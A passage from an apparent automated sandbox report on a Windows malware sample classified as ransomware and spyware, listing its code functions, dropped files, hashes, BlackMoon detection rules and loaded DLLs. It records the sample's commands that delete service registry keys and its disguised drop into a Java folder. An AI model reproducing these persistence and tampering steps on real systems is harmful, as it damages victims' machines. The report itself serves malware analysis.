          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ED47552_2_69ED4755
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC465C2_2_69EC465C
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9BBD02_2_69E9BBD0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E89BBC2_2_69E89BBC
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E89B902_2_69E89B90
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC3DB32_2_69EC3DB3
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E97D202_2_69E97D20
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA5C202_2_69EA5C20
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E891202_2_69E89120
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E971332_2_69E97133
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA53E02_2_69EA53E0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ED53922_2_69ED5392
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E952A02_2_69E952A0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69ECD2372_2_69ECD237
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9F5302_2_69E9F530
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EC151C2_2_69EC151C
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_0042E7D02_2_0042E7D0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_0045BB702_2_0045BB70
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_0046C1402_2_0046C140
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Java\DC1FFAF.exe A0C15F709E1B80E93A61CBA414E266097DC8C23A7E8DE2B6DBE825CA2952DF7E
          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\586030GBC.dll 7C00A8190DD048B43DEB36E99E52864DE4DC25211993426CBA32891F8F8824B2
          Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\A90B6898\5B7DOONHA.dll 7C00A8190DD048B43DEB36E99E52864DE4DC25211993426CBA32891F8F8824B2
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: String function: 69EC3A92 appears 80 times
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: String function: 69EBEC8D appears 74 times
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: String function: 69EBF2C5 appears 83 times
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: String function: 69EC5434 appears 73 times
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: String function: 69EBEFF0 appears 40 times
          Source: BD950wrst.dll.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
          Source: 712EVTPSM.dll.2.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
          Source: A815rppmj.dll.2.drStatic PE information: Resource name: RT_STRING type: DOS executable (COM, 0x8C-variant)
          Source: A815rppmj.dll.2.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
          Source: DC1FFAF.exe.0.drStatic PE information: Number of sections : 11 > 10
          Source: A815rppmj.dll.2.drStatic PE information: Number of sections : 11 > 10
          Source: 1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\2865ivSJ0 /f
          Source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll, type: DROPPEDMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
          Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll, type: DROPPEDMatched rule: MALWARE_Win_BlackMoon author = ditekSHen, description = Detects executables using BlackMoon RunTime
          Source: A815rppmj.dll.2.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          Source: A815rppmj.dll.2.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
          Source: DC1FFAF.exe.0.drStatic PE information: Section: 0DE ZLIB complexity 1.0002107998348018
          Source: DC1FFAF.exe.0.drStatic PE information: Section: 10ta ZLIB complexity 1.0015345982142858
          Source: A815rppmj.dll.2.drStatic PE information: Section: .data ZLIB complexity 0.9888200431034483
          Source: A815rppmj.dll.2.drStatic PE information: Section: .reloc ZLIB complexity 0.999194995777027
          Source: DC1FFAF.exe, 00000002.00000002.4749423959.0000000011782000.00000004.00000020.00020000.00000000.sdmp, DC1FFAF.exe, 00000002.00000002.4770861240.0000000013FCC000.00000004.00000020.00020000.00000000.sdmp, 42EEXUWWZ.dll.2.dr, 1F0xyrmp.dll.2.drBinary or memory string: ...Slnt
          Source: classification engineClassification label: mal100.rans.spyw.evad.winEXE@10/29@103/36
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EB3458 FormatMessageA,FormatMessageA,FormatMessageA,LocalFree,InternetGetLastResponseInfoA,InternetGetLastResponseInfoA,GetLastError,LocalAlloc,InternetGetLastResponseInfoA,LocalFree,LocalFree,FreeLibrary,2_2_69EB3458
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E87E30 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle,2_2_69E87E30
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9D690 OpenProcessToken,LookupPrivilegeValueA,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_69E9D690
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: CreateServiceA,GetLastError,CloseServiceHandle,2_2_69E88BA0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: CreateServiceA,GetLastError,CloseServiceHandle,2_2_69E87980
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69EA4680 CreateToolhelp32Snapshot,Process32First,Process32Next,2_2_69EA4680
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E9E3F0 CoCreateInstance,MultiByteToWideChar,2_2_69E9E3F0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E8BDB0 FindResourceA,2_2_69E8BDB0
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeCode function: 2_2_69E88BE0 OpenSCManagerA,CloseServiceHandle,OpenServiceA,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_69E88BE0
          Source: C:\Users\user\Desktop\1.exeFile created: C:\Program Files (x86)\java\DC1FFAF.exeJump to behavior
          Source: C:\Users\user\Desktop\1.exeFile created: C:\Users\user\Desktop\1.lnkJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8152:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
          Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: BD950wrst.dll.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: BD950wrst.dll.2.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: BD950wrst.dll.2.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: DC1FFAF.exe, 00000002.00000002.4716955883.0000000010412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM v
          Source: BD950wrst.dll.2.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: BD950wrst.dll.2.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: BD950wrst.dll.2.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
          Source: BD950wrst.dll.2.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: 1.exeReversingLabs: Detection: 28%
          Source: C:\Users\user\Desktop\1.exeFile read: C:\Users\user\Desktop\1.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\1.exe "C:\Users\user\Desktop\1.exe"
          Source: C:\Users\user\Desktop\1.exeProcess created: C:\Program Files (x86)\Java\DC1FFAF.exe "C:\Program Files (x86)\java\DC1FFAF.exe" WfCSiyl7KCmSe3x1d3x7eyiSWnspgSp9HpLfPHsme04=
          Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\2865ivSJ0 /f
          Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BC66DPQaf /f
          Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\1.exeProcess created: C:\Program Files (x86)\Java\DC1FFAF.exe "C:\Program Files (x86)\java\DC1FFAF.exe" WfCSiyl7KCmSe3x1d3x7eyiSWnspgSp9HpLfPHsme04=Jump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\2865ivSJ0 /fJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeProcess created: C:\Windows\SysWOW64\reg.exe "C:\Windows\System32\reg.exe" delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\BC66DPQaf /fJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: oledlg.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\1.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: oledlg.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: version.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dataexchange.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: d3d11.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dcomp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dxgi.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: msiso.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: mshtml.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: srpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: msimtf.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: d2d1.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: d3d10warp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dxcore.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: profext.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: uiautomationcore.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: jscript9.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: duser.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: atlthunk.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dxtrans.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: atl.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: ddrawex.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: ddraw.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dciman32.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: dxtmsft.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: webio.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: fltlib.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: slc.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: slc.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Program Files (x86)\Java\DC1FFAF.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
